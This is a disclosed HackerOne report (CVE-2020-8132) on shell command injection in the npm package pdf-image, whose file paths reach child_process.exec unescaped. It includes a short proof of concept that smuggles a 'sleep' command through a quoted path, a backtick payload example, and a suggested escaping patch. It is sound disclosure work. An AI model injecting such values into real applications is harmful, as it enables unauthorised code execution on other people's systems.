# Several simple remote code execution in pdf-image

### VULNERABILITY INFORMATION

I would like to report "A simple remote code execution" in "pdf-image".
It allows "a remote attacker to execute arbitrary code when several functions of the PDFImage class are called and the class loaded from user-input value".

# Module

**module name:** pdf-image
**version:** latest
**npm page:** `https://www.npmjs.com/package/pdf-image`

## Module Description

Provides an interface to convert PDF's pages to png files in Node.js by using ImageMagick.

## Module Stats

[1] weekly downloads: 8,691

# Vulnerability

## Vulnerability Description

Hello there ! I understand this bug isn't eligible for a bounty. I am reporting it either way. I've found several code execution in the pdf-image class, I tested one of them. They are simple and of course come from the child_process.exec call with lack of escaping. I tested one of them.

## Steps To Reproduce:

var PDFImage = require("pdf-image").PDFImage;

var pdfImage = new PDFImage('"; sleep 500 #"');
pdfImage.getInfo();

You can also exploit the vulnerability by submitting  backticks (example payload: `ls;sleep 5` which will be executed even though you're double-quoting the input.

## Patch
You can take example on your command-exists npm class:
var isUsingWindows = process.platform == 'win32'
var cleanInput = function(s) {
  if (/[^A-Za-z0-9_\/:=-]/.test(s)) {
    s = "'"+s.replace(/'/g,"'\\''")+"'";
    s = s.replace(/^(?:'')+/g, '') // unduplicate single-quote at the beginning
      .replace(/\\'''/g, "\\'" ); // remove non-escaped single-quote if there are enclosed between 2 escaped
  }
  return s;
}

if (isUsingWindows) {
  cleanInput = function(s) {
    var isPathName = /[\\]/.test(s);
    if (isPathName) {
      var dirname = '"' + path.dirname(s) + '"';
      var basename = '"' + path.basename(s) + '"';
      return dirname + ':' + basename;
    }
    return '"' + s + '"';
  }
}
## Supporting Material/References:

https://github.com/mooz/node-pdf-image/blob/master/index.js#L27

- Linux / centOS
- v6.17.1
- 3.10.10 
- N/A
- Own sample script

# Wrap up

> Select Y or N for the following statements:

- I contacted the maintainer to let them know: [Y/N] N
- I opened an issue in the related repository: [Y/N] N

Thanks!

## Impact

Bad code relying on that class can feel foul to RCE.

---

| Field | Value |
|-------|-------|
| **Report ID** | #781664 |
| **Title** | Several simple remote code execution in pdf-image |
| **URL** | https://hackerone.com/reports/781664 |
| **State** | Resolved |
| **Severity** | Critical (?) |
| **Weakness** | Code Injection |
| **CVE IDs** | CVE-2020-8132 |
| **Program** | Node.js third-party modules |
| **Reporter** | gabriel-kimiaie |
| **Submitted** | January 23, 2020, 5:10PM UTC |
| **Disclosed** | February 24, 2020, 8:00AM UTC |
| **Visibility** | full |
| **Bounty** | None |

--- *Downloaded from https://hackerone.com/reports/781664*